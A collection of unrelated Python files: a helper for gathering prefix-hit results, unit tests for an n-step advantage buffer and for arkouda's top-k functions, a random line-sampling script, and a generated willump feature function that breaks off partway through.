        tuple[list[int], list[int]]: (hit counts per prefix, the prefix
        lengths actually used).
    """
    if samples is None:
        samples = list(range(1, len(ctrs) + 1))
    truth = trueset if isinstance(trueset, set) else set(trueset)
    hits = [len(truth.intersection(ctrs[:prefix])) for prefix in samples]
    return hits, samples
def getarrs(dat):
    """Convert each score series in a ``gather_data`` result into a numpy array.

    Args:
        dat: dict shaped like ``gather_data``'s return value, i.e. with
            ``dat['res']['scores']`` holding the per-file score series.

    Returns:
        list[numpy.ndarray]: one array per score series.
    """
    # The original built this list and then fell off the end, returning None
    # and making the function useless; return the arrays. (`np` comes from
    # the module's star import — presumably numpy; confirm in selexp.)
    return [np.array(scores) for scores in dat['res']['scores']]
def gather_data(files, trueset, samples=None):
    """Collect per-file metadata and prefix-hit curves for a set of result files.

    Args:
        files: result filenames (encode the method type and measure).
        trueset: ground-truth center ids.
        samples: optional prefix lengths forwarded to ``centers2res``.

    Returns:
        dict with "types", "measures", "centers", and a nested "res" dict
        holding the per-file scores and the sample lengths.
    """
    types = [fn2type(name) for name in files]
    measures = [fn2measure(name) for name in files]
    centers = [load_centers(name) for name in files]
    truth = set(trueset)
    scores = [centers2res(ctrs, truth, samples=samples) for ctrs in centers]
    return {
        "types": types,
        "measures": measures,
        "centers": centers,
        "res": {
            "scores": scores, "samples": samples
        },
    }
|
1689463
|
import unittest
import torch
import torch_testing as tt
from all import nn
from all.core import StateArray
from all.approximation import VNetwork, FeatureNetwork
from all.memory import NStepAdvantageBuffer
class NStepAdvantageBufferTest(unittest.TestCase):
    """Tests for NStepAdvantageBuffer: n-step returns, bootstrap states and
    lengths, episode-termination handling, and repeated rollouts. Uses a
    discount factor of 0.5 so the expected returns are easy to compute by
    hand."""

    def setUp(self):
        # Fixed seed so the (untrained) feature/value networks are deterministic.
        torch.manual_seed(1)
        self.features = FeatureNetwork(nn.Linear(1, 2), None)
        self.v = VNetwork(nn.Linear(2, 1), None)

    def _compute_expected_advantages(self, states, returns, next_states, lengths):
        # Advantage = n-step return + gamma^length * V(next_state) - V(state),
        # with gamma = 0.5 and `lengths` the number of steps actually rolled out.
        return (
            returns
            + (0.5 ** lengths.float()) * self.v.eval(self.features.eval(next_states))
            - self.v.eval(self.features.eval(states))
        )

    def test_rollout(self):
        # 3 parallel envs, n-step = 2, no terminations.
        buffer = NStepAdvantageBuffer(self.v, self.features, 2, 3, discount_factor=0.5)
        actions = torch.ones((3))
        states = StateArray(torch.arange(0, 12).unsqueeze(1).float(), (12,))
        buffer.store(states[0:3], actions, torch.zeros(3))
        buffer.store(states[3:6], actions, torch.ones(3))
        states, _, advantages = buffer.advantages(states[6:9])
        expected_states = StateArray(torch.arange(0, 6).unsqueeze(1).float(), (6,))
        # Both stored timesteps bootstrap from the same final states 6..8.
        expected_next_states = StateArray(
            torch.cat((torch.arange(6, 9), torch.arange(6, 9))).unsqueeze(1).float(), (6,)
        )
        expected_returns = torch.tensor([
            0.5, 0.5, 0.5,
            1, 1, 1
        ]).float()
        expected_lengths = torch.tensor([
            2., 2, 2,
            1, 1, 1
        ])
        self.assert_states_equal(states, expected_states)
        tt.assert_allclose(advantages, self._compute_expected_advantages(
            expected_states, expected_returns, expected_next_states, expected_lengths
        ))

    def test_rollout_with_dones(self):
        # Episode terminations at global steps 5, 7, and 9 truncate the
        # n-step rollouts at the episode boundary.
        buffer = NStepAdvantageBuffer(self.v, self.features, 3, 3, discount_factor=0.5)
        done = torch.tensor([False] * 12)
        done[5] = True
        done[7] = True
        done[9] = True
        states = StateArray(torch.arange(0, 12).unsqueeze(1).float(), (12,), done=done)
        actions = torch.ones((3))
        buffer.store(states[0:3], actions, torch.zeros(3))
        buffer.store(states[3:6], actions, torch.ones(3))
        buffer.store(states[6:9], actions, 2 * torch.ones(3))
        states, actions, advantages = buffer.advantages(states[9:12])
        expected_states = StateArray(torch.arange(0, 9).unsqueeze(1).float(), (9,), done=done[0:9])
        expected_next_done = torch.tensor([True] * 9)
        expected_next_done[5] = False
        expected_next_done[7] = False
        expected_next_done[8] = False
        expected_next_states = StateArray(torch.tensor([
            9, 7, 5,
            9, 7, 11,
            9, 10, 11
        ]).unsqueeze(1).float(), (9,), done=expected_next_done)
        expected_returns = torch.tensor([
            1, 0.5, 0,
            2, 1, 2,
            2, 2, 2
        ]).float()
        expected_lengths = torch.tensor([
            3, 2, 1,
            2, 1, 2,
            1, 1, 1
        ]).float()
        self.assert_states_equal(states, expected_states)
        tt.assert_allclose(advantages, self._compute_expected_advantages(
            expected_states, expected_returns, expected_next_states, expected_lengths
        ))

    def test_multi_rollout(self):
        # The buffer must reset cleanly and produce a second, independent
        # rollout after the first advantages() call.
        buffer = NStepAdvantageBuffer(self.v, self.features, 2, 2, discount_factor=0.5)
        raw_states = StateArray(torch.arange(0, 12).unsqueeze(1).float(), (12,))
        actions = torch.ones((2))
        buffer.store(raw_states[0:2], actions, torch.ones(2))
        buffer.store(raw_states[2:4], actions, torch.ones(2))
        states, actions, advantages = buffer.advantages(raw_states[4:6])
        expected_states = StateArray(torch.arange(0, 4).unsqueeze(1).float(), (4,))
        expected_returns = torch.tensor([1.5, 1.5, 1, 1])
        expected_next_states = StateArray(torch.tensor([4., 5, 4, 5]).unsqueeze(1), (4,))
        expected_lengths = torch.tensor([2., 2, 1, 1])
        self.assert_states_equal(states, expected_states)
        tt.assert_allclose(advantages, self._compute_expected_advantages(
            expected_states,
            expected_returns,
            expected_next_states,
            expected_lengths
        ))
        # Second rollout over steps 4..8.
        buffer.store(raw_states[4:6], actions, torch.ones(2))
        buffer.store(raw_states[6:8], actions, torch.ones(2))
        states, actions, advantages = buffer.advantages(raw_states[8:10])
        expected_states = StateArray(torch.arange(4, 8).unsqueeze(1).float(), (4,))
        self.assert_states_equal(states, expected_states)
        tt.assert_allclose(advantages, self._compute_expected_advantages(
            expected_states,
            torch.tensor([1.5, 1.5, 1, 1]),
            StateArray(torch.tensor([8, 9, 8, 9]).unsqueeze(1).float(), (4,)),
            torch.tensor([2., 2, 1, 1])
        ))

    def assert_array_equal(self, actual, expected):
        # Element-wise comparison with a readable failure message.
        for i, exp in enumerate(expected):
            self.assertEqual(actual[i], exp, msg=(
                ("\nactual: %s\nexpected: %s") % (actual, expected)))

    def assert_states_equal(self, actual, expected):
        # Compare observations (approximately) and masks (exactly).
        tt.assert_almost_equal(actual.observation, expected.observation)
        tt.assert_equal(actual.mask, expected.mask)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
1689468
|
import numpy as np
from context import arkouda as ak
from base_test import ArkoudaTest
SIZE = 10
K = 5
def make_array():
    """Build a random arkouda array of SIZE integers drawn from [0, SIZE)."""
    return ak.randint(0, SIZE, SIZE)
def compare_results(akres, sortedres) -> int:
    '''
    Compares the arkouda and numpy arrays element-wise via numpy.array_equal
    (exact match), returning 0 if the arrays are identical and 1 if they
    differ, printing the differing values for debugging.

    :return: 0 (identical) or 1 (dissimilar)
    :rtype: int
    '''
    akres = akres.to_ndarray()
    if not np.array_equal(akres, sortedres):
        # Convert both sides back to arkouda arrays so in1d (with invert=True)
        # can report the symmetric difference.
        akres = ak.array(akres)
        sortedres = ak.array(sortedres)
        innp = sortedres[ak.in1d(ak.array(sortedres), ak.array(akres), True)]  # values in np array, but not ak array
        inak = akres[ak.in1d(ak.array(akres), ak.array(sortedres), True)]  # values in ak array, but not np array
        print(f"(values in np but not ak: {innp}) (values in ak but not np: {inak})")
        return 1
    return 0
def run_test(runMin=True, isInd=True, verbose=True):
    '''
    The run_test method runs execution of the mink/maxk (or argmink/argmaxk)
    reduction on a randomized array and compares the result against a
    numpy sort of the same data.

    :param runMin: take the smallest K values if True, the largest if False
    :param isInd: use the index-returning arg* variants if True
    :param verbose: print arkouda errors when they occur
    :return: number of failed comparisons (0 or 1)
    '''
    aka = make_array()
    failures = 0
    try:
        if not isInd:
            if runMin:
                akres = ak.mink(aka, K)
                npres = np.sort(aka.to_ndarray())[:K]  # first K elements from sorted array
            else:
                akres = ak.maxk(aka, K)
                npres = np.sort(aka.to_ndarray())[-K:]  # last K elements from sorted array
        else:
            # The arg* variants return indices; index back into the array so
            # values can be compared against the numpy reference.
            if runMin:
                akres = aka[ak.argmink(aka, K)]
                npres = np.sort(aka.to_ndarray())[:K]  # first K elements from sorted array
            else:
                akres = aka[ak.argmaxk(aka, K)]
                npres = np.sort(aka.to_ndarray())[-K:]  # last K elements from sorted array
    except RuntimeError as E:
        if verbose: print("Arkouda error: ", E)
        return 1
    failures += compare_results(akres, npres)
    return failures
class MinKTest(ArkoudaTest):
    """Tests ak.mink correctness against numpy plus its argument validation."""

    def test_mink(self):
        '''
        Executes run_test and asserts whether there are any errors

        :return: None
        :raise: AssertionError if there are any errors encountered in run_test for set operations
        '''
        self.assertEqual(0, run_test())

    def test_error_handling(self):
        # Each invalid call must fail fast with a precise type/value message.
        testArray = ak.randint(0, 100, 100)

        with self.assertRaises(TypeError) as cm:
            ak.mink(list(range(0,10)), 1)
        self.assertEqual('type of argument "pda" must be arkouda.pdarrayclass.pdarray; got list instead',
                         cm.exception.args[0])

        with self.assertRaises(TypeError) as cm:
            ak.mink(testArray, '1')
        self.assertEqual('type of argument "k" must be one of (int, int64); got str instead',
                         cm.exception.args[0])

        with self.assertRaises(ValueError) as cm:
            ak.mink(testArray, -1)
        self.assertEqual("k must be 1 or greater",
                         cm.exception.args[0])

        with self.assertRaises(ValueError) as cm:
            ak.mink(ak.array([]), 1)
        self.assertEqual("must be a non-empty pdarray of type int or float",
                         cm.exception.args[0])
class MaxKTest(ArkoudaTest):
    """Tests ak.maxk correctness against numpy plus its argument validation."""

    def test_maxk(self):
        '''
        Executes run_test and asserts whether there are any errors

        :return: None
        :raise: AssertionError if there are any errors encountered in run_test for set operations
        '''
        self.assertEqual(0, run_test(runMin=False))

    def test_error_handling(self):
        # Each invalid call must fail fast with a precise type/value message.
        testArray = ak.randint(0, 100, 100)

        with self.assertRaises(TypeError) as cm:
            ak.maxk(list(range(0,10)), 1)
        self.assertEqual('type of argument "pda" must be arkouda.pdarrayclass.pdarray; got list instead',
                         cm.exception.args[0])

        with self.assertRaises(TypeError) as cm:
            ak.maxk(testArray, '1')
        self.assertEqual('type of argument "k" must be one of (int, int64); got str instead',
                         cm.exception.args[0])

        with self.assertRaises(ValueError) as cm:
            ak.maxk(testArray, -1)
        self.assertEqual("k must be 1 or greater",
                         cm.exception.args[0])

        with self.assertRaises(ValueError) as cm:
            ak.maxk(ak.array([]), 1)
        self.assertEqual("must be a non-empty pdarray of type int or float",
                         cm.exception.args[0])
class ArgMinKTest(ArkoudaTest):
    """Tests ak.argmink correctness against numpy plus its argument validation."""

    def test_argmink(self):
        '''
        Executes run_test and asserts whether there are any errors

        :return: None
        :raise: AssertionError if there are any errors encountered in run_test for set operations
        '''
        self.assertEqual(0, run_test(isInd=True))

    def test_error_handling(self):
        # Each invalid call must fail fast with a precise type/value message.
        testArray = ak.randint(0, 100, 100)

        with self.assertRaises(TypeError) as cm:
            ak.argmink(list(range(0,10)), 1)
        self.assertEqual('type of argument "pda" must be arkouda.pdarrayclass.pdarray; got list instead',
                         cm.exception.args[0])

        with self.assertRaises(TypeError) as cm:
            ak.argmink(testArray, '1')
        self.assertEqual('type of argument "k" must be one of (int, int64); got str instead',
                         cm.exception.args[0])

        with self.assertRaises(ValueError) as cm:
            ak.argmink(testArray, -1)
        self.assertEqual("k must be 1 or greater",
                         cm.exception.args[0])

        with self.assertRaises(ValueError) as cm:
            ak.argmink(ak.array([]), 1)
        self.assertEqual("must be a non-empty pdarray of type int or float",
                         cm.exception.args[0])
class ArgMaxKTest(ArkoudaTest):
    """Tests ak.argmaxk correctness against numpy plus its argument validation."""

    def test_argmaxk(self):
        '''
        Executes run_test and asserts whether there are any errors

        :return: None
        :raise: AssertionError if there are any errors encountered in run_test for set operations
        '''
        self.assertEqual(0, run_test(runMin=False, isInd=True))

    def test_error_handling(self):
        # Each invalid call must fail fast with a precise type/value message.
        testArray = ak.randint(0, 100, 100)

        with self.assertRaises(TypeError) as cm:
            ak.argmaxk(list(range(0,10)), 1)
        self.assertEqual('type of argument "pda" must be arkouda.pdarrayclass.pdarray; got list instead',
                         cm.exception.args[0])

        with self.assertRaises(TypeError) as cm:
            ak.argmaxk(testArray, '1')
        self.assertEqual('type of argument "k" must be one of (int, int64); got str instead',
                         cm.exception.args[0])

        with self.assertRaises(ValueError) as cm:
            ak.argmaxk(testArray, -1)
        self.assertEqual("k must be 1 or greater",
                         cm.exception.args[0])

        with self.assertRaises(ValueError) as cm:
            ak.argmaxk(ak.array([]), 1)
        self.assertEqual("must be a non-empty pdarray of type int or float",
                         cm.exception.args[0])
|
1689469
|
import argparse
from functools import partial
import gzip
from pathlib import Path
import random
from typing import List
from tqdm import tqdm
def get_random_lines_from_file(filepath, title_line: bool = True,
                               k: int = 1, N: int = 1) -> List[List]:
    """Draw N independent random samples of k lines each from a text file.

    Transparently reads gzip-compressed files (``.gz`` suffix). Sampling is
    with replacement (``random.choices``). When ``title_line`` is True, the
    first line of the file is prepended to every sample and excluded from the
    sampling pool.

    Returns:
        A list of N samples, each a list of raw lines (newlines preserved).
    """
    opener = partial(gzip.open, mode='rt') if Path(filepath).suffix == '.gz' else open
    with opener(filepath) as handle:
        all_lines = list(tqdm(handle))
    samples = []
    for _ in range(N):
        if title_line:
            picked = [all_lines[0]] + random.choices(all_lines[1:], k=k)
        else:
            picked = random.choices(all_lines, k=k)
        samples.append(picked)
    return samples
def main():
    """CLI entry point: sample random line sets and write each to its own CSV."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--input')
    parser.add_argument('--output')
    parser.add_argument('--no-title-line', action='store_true', default=False)
    parser.add_argument('-k', type=int, default=1)
    parser.add_argument('-N', type=int, default=1)
    args = parser.parse_args()
    print(args, flush=True)

    samples = get_random_lines_from_file(
        args.input, not args.no_title_line, args.k, args.N
    )
    # One output file per sample, suffixed with the sample index.
    for idx, sample in enumerate(samples):
        with open(f'{args.output}_{idx}.csv', 'w') as out:
            out.writelines(sample)
# Script entry point.
if __name__ == '__main__':
    main()
|
1689498
|
import numpy
import math
from timeit import default_timer as timer
import willump.evaluation.willump_executor
@willump.evaluation.willump_executor.willump_execute()
def process_row(input_numpy_array):
return_numpy_array = numpy.zeros(516)
return_numpy_array[0] = input_numpy_array[68] / math.sqrt(input_numpy_array[68])
return_numpy_array[1] = input_numpy_array[41] / math.sqrt(input_numpy_array[71])
return_numpy_array[2] = input_numpy_array[50] / math.sqrt(input_numpy_array[55])
return_numpy_array[3] = input_numpy_array[78] / math.sqrt(input_numpy_array[82])
return_numpy_array[4] = input_numpy_array[6] / math.sqrt(input_numpy_array[76])
return_numpy_array[5] = input_numpy_array[21] / math.sqrt(input_numpy_array[99])
return_numpy_array[6] = input_numpy_array[15] / math.sqrt(input_numpy_array[73])
return_numpy_array[7] = input_numpy_array[45] / math.sqrt(input_numpy_array[39])
return_numpy_array[8] = input_numpy_array[89] / math.sqrt(input_numpy_array[80])
return_numpy_array[9] = input_numpy_array[21] / math.sqrt(input_numpy_array[27])
return_numpy_array[10] = input_numpy_array[64] / math.sqrt(input_numpy_array[82])
return_numpy_array[11] = input_numpy_array[53] / math.sqrt(input_numpy_array[15])
return_numpy_array[12] = input_numpy_array[15] / math.sqrt(input_numpy_array[95])
return_numpy_array[13] = input_numpy_array[52] / math.sqrt(input_numpy_array[93])
return_numpy_array[14] = input_numpy_array[65] / math.sqrt(input_numpy_array[100])
return_numpy_array[15] = input_numpy_array[47] / math.sqrt(input_numpy_array[19])
return_numpy_array[16] = input_numpy_array[43] / math.sqrt(input_numpy_array[17])
return_numpy_array[17] = input_numpy_array[37] / math.sqrt(input_numpy_array[49])
return_numpy_array[18] = input_numpy_array[17] / math.sqrt(input_numpy_array[85])
return_numpy_array[19] = input_numpy_array[33] / math.sqrt(input_numpy_array[85])
return_numpy_array[20] = input_numpy_array[53] / math.sqrt(input_numpy_array[10])
return_numpy_array[21] = input_numpy_array[50] / math.sqrt(input_numpy_array[12])
return_numpy_array[22] = input_numpy_array[46] / math.sqrt(input_numpy_array[13])
return_numpy_array[23] = input_numpy_array[85] / math.sqrt(input_numpy_array[0])
return_numpy_array[24] = input_numpy_array[31] / math.sqrt(input_numpy_array[84])
return_numpy_array[25] = input_numpy_array[77] / math.sqrt(input_numpy_array[93])
return_numpy_array[26] = input_numpy_array[7] / math.sqrt(input_numpy_array[89])
return_numpy_array[27] = input_numpy_array[62] / math.sqrt(input_numpy_array[31])
return_numpy_array[28] = input_numpy_array[17] / math.sqrt(input_numpy_array[57])
return_numpy_array[29] = input_numpy_array[100] / math.sqrt(input_numpy_array[64])
return_numpy_array[30] = input_numpy_array[74] / math.sqrt(input_numpy_array[83])
return_numpy_array[31] = input_numpy_array[24] / math.sqrt(input_numpy_array[32])
return_numpy_array[32] = input_numpy_array[33] / math.sqrt(input_numpy_array[34])
return_numpy_array[33] = input_numpy_array[25] / math.sqrt(input_numpy_array[9])
return_numpy_array[34] = input_numpy_array[59] / math.sqrt(input_numpy_array[40])
return_numpy_array[35] = input_numpy_array[42] / math.sqrt(input_numpy_array[63])
return_numpy_array[36] = input_numpy_array[41] / math.sqrt(input_numpy_array[78])
return_numpy_array[37] = input_numpy_array[56] / math.sqrt(input_numpy_array[40])
return_numpy_array[38] = input_numpy_array[42] / math.sqrt(input_numpy_array[47])
return_numpy_array[39] = input_numpy_array[33] / math.sqrt(input_numpy_array[8])
return_numpy_array[40] = input_numpy_array[16] / math.sqrt(input_numpy_array[15])
return_numpy_array[41] = input_numpy_array[93] / math.sqrt(input_numpy_array[52])
return_numpy_array[42] = input_numpy_array[44] / math.sqrt(input_numpy_array[57])
return_numpy_array[43] = input_numpy_array[16] / math.sqrt(input_numpy_array[39])
return_numpy_array[44] = input_numpy_array[19] / math.sqrt(input_numpy_array[65])
return_numpy_array[45] = input_numpy_array[59] / math.sqrt(input_numpy_array[40])
return_numpy_array[46] = input_numpy_array[32] / math.sqrt(input_numpy_array[59])
return_numpy_array[47] = input_numpy_array[76] / math.sqrt(input_numpy_array[71])
return_numpy_array[48] = input_numpy_array[34] / math.sqrt(input_numpy_array[56])
return_numpy_array[49] = input_numpy_array[67] / math.sqrt(input_numpy_array[10])
return_numpy_array[50] = input_numpy_array[32] / math.sqrt(input_numpy_array[45])
return_numpy_array[51] = input_numpy_array[29] / math.sqrt(input_numpy_array[83])
return_numpy_array[52] = input_numpy_array[37] / math.sqrt(input_numpy_array[56])
return_numpy_array[53] = input_numpy_array[94] / math.sqrt(input_numpy_array[67])
return_numpy_array[54] = input_numpy_array[64] / math.sqrt(input_numpy_array[78])
return_numpy_array[55] = input_numpy_array[20] / math.sqrt(input_numpy_array[68])
return_numpy_array[56] = input_numpy_array[10] / math.sqrt(input_numpy_array[10])
return_numpy_array[57] = input_numpy_array[93] / math.sqrt(input_numpy_array[12])
return_numpy_array[58] = input_numpy_array[56] / math.sqrt(input_numpy_array[7])
return_numpy_array[59] = input_numpy_array[93] / math.sqrt(input_numpy_array[100])
return_numpy_array[60] = input_numpy_array[78] / math.sqrt(input_numpy_array[83])
return_numpy_array[61] = input_numpy_array[37] / math.sqrt(input_numpy_array[61])
return_numpy_array[62] = input_numpy_array[61] / math.sqrt(input_numpy_array[58])
return_numpy_array[63] = input_numpy_array[72] / math.sqrt(input_numpy_array[61])
return_numpy_array[64] = input_numpy_array[67] / math.sqrt(input_numpy_array[70])
return_numpy_array[65] = input_numpy_array[59] / math.sqrt(input_numpy_array[75])
return_numpy_array[66] = input_numpy_array[45] / math.sqrt(input_numpy_array[38])
return_numpy_array[67] = input_numpy_array[56] / math.sqrt(input_numpy_array[71])
return_numpy_array[68] = input_numpy_array[3] / math.sqrt(input_numpy_array[69])
return_numpy_array[69] = input_numpy_array[5] / math.sqrt(input_numpy_array[38])
return_numpy_array[70] = input_numpy_array[91] / math.sqrt(input_numpy_array[84])
return_numpy_array[71] = input_numpy_array[0] / math.sqrt(input_numpy_array[87])
return_numpy_array[72] = input_numpy_array[99] / math.sqrt(input_numpy_array[98])
return_numpy_array[73] = input_numpy_array[58] / math.sqrt(input_numpy_array[37])
return_numpy_array[74] = input_numpy_array[70] / math.sqrt(input_numpy_array[63])
return_numpy_array[75] = input_numpy_array[85] / math.sqrt(input_numpy_array[74])
return_numpy_array[76] = input_numpy_array[91] / math.sqrt(input_numpy_array[64])
return_numpy_array[77] = input_numpy_array[94] / math.sqrt(input_numpy_array[81])
return_numpy_array[78] = input_numpy_array[73] / math.sqrt(input_numpy_array[86])
return_numpy_array[79] = input_numpy_array[25] / math.sqrt(input_numpy_array[98])
return_numpy_array[80] = input_numpy_array[65] / math.sqrt(input_numpy_array[37])
return_numpy_array[81] = input_numpy_array[20] / math.sqrt(input_numpy_array[87])
return_numpy_array[82] = input_numpy_array[70] / math.sqrt(input_numpy_array[76])
return_numpy_array[83] = input_numpy_array[34] / math.sqrt(input_numpy_array[28])
return_numpy_array[84] = input_numpy_array[50] / math.sqrt(input_numpy_array[57])
return_numpy_array[85] = input_numpy_array[41] / math.sqrt(input_numpy_array[4])
return_numpy_array[86] = input_numpy_array[83] / math.sqrt(input_numpy_array[29])
return_numpy_array[87] = input_numpy_array[67] / math.sqrt(input_numpy_array[14])
return_numpy_array[88] = input_numpy_array[73] / math.sqrt(input_numpy_array[17])
return_numpy_array[89] = input_numpy_array[3] / math.sqrt(input_numpy_array[31])
return_numpy_array[90] = input_numpy_array[49] / math.sqrt(input_numpy_array[24])
return_numpy_array[91] = input_numpy_array[96] / math.sqrt(input_numpy_array[29])
return_numpy_array[92] = input_numpy_array[12] / math.sqrt(input_numpy_array[30])
return_numpy_array[93] = input_numpy_array[29] / math.sqrt(input_numpy_array[55])
return_numpy_array[94] = input_numpy_array[13] / math.sqrt(input_numpy_array[51])
return_numpy_array[95] = input_numpy_array[9] / math.sqrt(input_numpy_array[18])
return_numpy_array[96] = input_numpy_array[80] / math.sqrt(input_numpy_array[64])
return_numpy_array[97] = input_numpy_array[67] / math.sqrt(input_numpy_array[30])
return_numpy_array[98] = input_numpy_array[53] / math.sqrt(input_numpy_array[61])
return_numpy_array[99] = input_numpy_array[65] / math.sqrt(input_numpy_array[50])
return_numpy_array[100] = input_numpy_array[21] / math.sqrt(input_numpy_array[67])
return_numpy_array[101] = input_numpy_array[68] / math.sqrt(input_numpy_array[30])
return_numpy_array[102] = input_numpy_array[2] / math.sqrt(input_numpy_array[85])
return_numpy_array[103] = input_numpy_array[41] / math.sqrt(input_numpy_array[81])
return_numpy_array[104] = input_numpy_array[86] / math.sqrt(input_numpy_array[43])
return_numpy_array[105] = input_numpy_array[33] / math.sqrt(input_numpy_array[70])
return_numpy_array[106] = input_numpy_array[29] / math.sqrt(input_numpy_array[30])
return_numpy_array[107] = input_numpy_array[6] / math.sqrt(input_numpy_array[80])
return_numpy_array[108] = input_numpy_array[3] / math.sqrt(input_numpy_array[62])
return_numpy_array[109] = input_numpy_array[72] / math.sqrt(input_numpy_array[68])
return_numpy_array[110] = input_numpy_array[15] / math.sqrt(input_numpy_array[25])
return_numpy_array[111] = input_numpy_array[43] / math.sqrt(input_numpy_array[22])
return_numpy_array[112] = input_numpy_array[20] / math.sqrt(input_numpy_array[71])
return_numpy_array[113] = input_numpy_array[33] / math.sqrt(input_numpy_array[32])
return_numpy_array[114] = input_numpy_array[74] / math.sqrt(input_numpy_array[10])
return_numpy_array[115] = input_numpy_array[37] / math.sqrt(input_numpy_array[95])
return_numpy_array[116] = input_numpy_array[43] / math.sqrt(input_numpy_array[34])
return_numpy_array[117] = input_numpy_array[21] / math.sqrt(input_numpy_array[75])
return_numpy_array[118] = input_numpy_array[31] / math.sqrt(input_numpy_array[90])
return_numpy_array[119] = input_numpy_array[23] / math.sqrt(input_numpy_array[78])
return_numpy_array[120] = input_numpy_array[22] / math.sqrt(input_numpy_array[28])
return_numpy_array[121] = input_numpy_array[44] / math.sqrt(input_numpy_array[71])
return_numpy_array[122] = input_numpy_array[12] / math.sqrt(input_numpy_array[30])
return_numpy_array[123] = input_numpy_array[78] / math.sqrt(input_numpy_array[87])
return_numpy_array[124] = input_numpy_array[56] / math.sqrt(input_numpy_array[37])
return_numpy_array[125] = input_numpy_array[31] / math.sqrt(input_numpy_array[77])
return_numpy_array[126] = input_numpy_array[89] / math.sqrt(input_numpy_array[88])
return_numpy_array[127] = input_numpy_array[83] / math.sqrt(input_numpy_array[87])
return_numpy_array[128] = input_numpy_array[41] / math.sqrt(input_numpy_array[96])
return_numpy_array[129] = input_numpy_array[2] / math.sqrt(input_numpy_array[2])
return_numpy_array[130] = input_numpy_array[18] / math.sqrt(input_numpy_array[96])
return_numpy_array[131] = input_numpy_array[42] / math.sqrt(input_numpy_array[93])
return_numpy_array[132] = input_numpy_array[71] / math.sqrt(input_numpy_array[3])
return_numpy_array[133] = input_numpy_array[27] / math.sqrt(input_numpy_array[88])
return_numpy_array[134] = input_numpy_array[45] / math.sqrt(input_numpy_array[74])
return_numpy_array[135] = input_numpy_array[88] / math.sqrt(input_numpy_array[24])
return_numpy_array[136] = input_numpy_array[98] / math.sqrt(input_numpy_array[47])
return_numpy_array[137] = input_numpy_array[86] / math.sqrt(input_numpy_array[48])
return_numpy_array[138] = input_numpy_array[70] / math.sqrt(input_numpy_array[74])
return_numpy_array[139] = input_numpy_array[19] / math.sqrt(input_numpy_array[20])
return_numpy_array[140] = input_numpy_array[75] / math.sqrt(input_numpy_array[92])
return_numpy_array[141] = input_numpy_array[78] / math.sqrt(input_numpy_array[5])
return_numpy_array[142] = input_numpy_array[5] / math.sqrt(input_numpy_array[6])
return_numpy_array[143] = input_numpy_array[67] / math.sqrt(input_numpy_array[48])
return_numpy_array[144] = input_numpy_array[26] / math.sqrt(input_numpy_array[22])
return_numpy_array[145] = input_numpy_array[85] / math.sqrt(input_numpy_array[42])
return_numpy_array[146] = input_numpy_array[16] / math.sqrt(input_numpy_array[47])
return_numpy_array[147] = input_numpy_array[56] / math.sqrt(input_numpy_array[79])
return_numpy_array[148] = input_numpy_array[52] / math.sqrt(input_numpy_array[90])
return_numpy_array[149] = input_numpy_array[67] / math.sqrt(input_numpy_array[94])
return_numpy_array[150] = input_numpy_array[24] / math.sqrt(input_numpy_array[87])
return_numpy_array[151] = input_numpy_array[76] / math.sqrt(input_numpy_array[73])
return_numpy_array[152] = input_numpy_array[23] / math.sqrt(input_numpy_array[78])
return_numpy_array[153] = input_numpy_array[5] / math.sqrt(input_numpy_array[16])
return_numpy_array[154] = input_numpy_array[86] / math.sqrt(input_numpy_array[59])
return_numpy_array[155] = input_numpy_array[35] / math.sqrt(input_numpy_array[65])
return_numpy_array[156] = input_numpy_array[3] / math.sqrt(input_numpy_array[64])
return_numpy_array[157] = input_numpy_array[51] / math.sqrt(input_numpy_array[62])
return_numpy_array[158] = input_numpy_array[6] / math.sqrt(input_numpy_array[88])
return_numpy_array[159] = input_numpy_array[89] / math.sqrt(input_numpy_array[10])
return_numpy_array[160] = input_numpy_array[59] / math.sqrt(input_numpy_array[94])
return_numpy_array[161] = input_numpy_array[16] / math.sqrt(input_numpy_array[0])
return_numpy_array[162] = input_numpy_array[49] / math.sqrt(input_numpy_array[87])
return_numpy_array[163] = input_numpy_array[0] / math.sqrt(input_numpy_array[64])
return_numpy_array[164] = input_numpy_array[31] / math.sqrt(input_numpy_array[76])
return_numpy_array[165] = input_numpy_array[93] / math.sqrt(input_numpy_array[86])
return_numpy_array[166] = input_numpy_array[31] / math.sqrt(input_numpy_array[54])
return_numpy_array[167] = input_numpy_array[60] / math.sqrt(input_numpy_array[35])
return_numpy_array[168] = input_numpy_array[80] / math.sqrt(input_numpy_array[5])
return_numpy_array[169] = input_numpy_array[5] / math.sqrt(input_numpy_array[88])
return_numpy_array[170] = input_numpy_array[70] / math.sqrt(input_numpy_array[92])
return_numpy_array[171] = input_numpy_array[100] / math.sqrt(input_numpy_array[53])
return_numpy_array[172] = input_numpy_array[30] / math.sqrt(input_numpy_array[61])
return_numpy_array[173] = input_numpy_array[50] / math.sqrt(input_numpy_array[40])
return_numpy_array[174] = input_numpy_array[13] / math.sqrt(input_numpy_array[62])
return_numpy_array[175] = input_numpy_array[81] / math.sqrt(input_numpy_array[5])
return_numpy_array[176] = input_numpy_array[21] / math.sqrt(input_numpy_array[18])
return_numpy_array[177] = input_numpy_array[68] / math.sqrt(input_numpy_array[16])
return_numpy_array[178] = input_numpy_array[76] / math.sqrt(input_numpy_array[97])
return_numpy_array[179] = input_numpy_array[30] / math.sqrt(input_numpy_array[8])
return_numpy_array[180] = input_numpy_array[69] / math.sqrt(input_numpy_array[72])
return_numpy_array[181] = input_numpy_array[79] / math.sqrt(input_numpy_array[72])
return_numpy_array[182] = input_numpy_array[84] / math.sqrt(input_numpy_array[36])
return_numpy_array[183] = input_numpy_array[74] / math.sqrt(input_numpy_array[28])
return_numpy_array[184] = input_numpy_array[97] / math.sqrt(input_numpy_array[78])
return_numpy_array[185] = input_numpy_array[56] / math.sqrt(input_numpy_array[18])
return_numpy_array[186] = input_numpy_array[63] / math.sqrt(input_numpy_array[50])
return_numpy_array[187] = input_numpy_array[57] / math.sqrt(input_numpy_array[29])
return_numpy_array[188] = input_numpy_array[26] / math.sqrt(input_numpy_array[41])
return_numpy_array[189] = input_numpy_array[24] / math.sqrt(input_numpy_array[53])
return_numpy_array[190] = input_numpy_array[93] / math.sqrt(input_numpy_array[53])
return_numpy_array[191] = input_numpy_array[23] / math.sqrt(input_numpy_array[7])
return_numpy_array[192] = input_numpy_array[27] / math.sqrt(input_numpy_array[96])
return_numpy_array[193] = input_numpy_array[67] / math.sqrt(input_numpy_array[81])
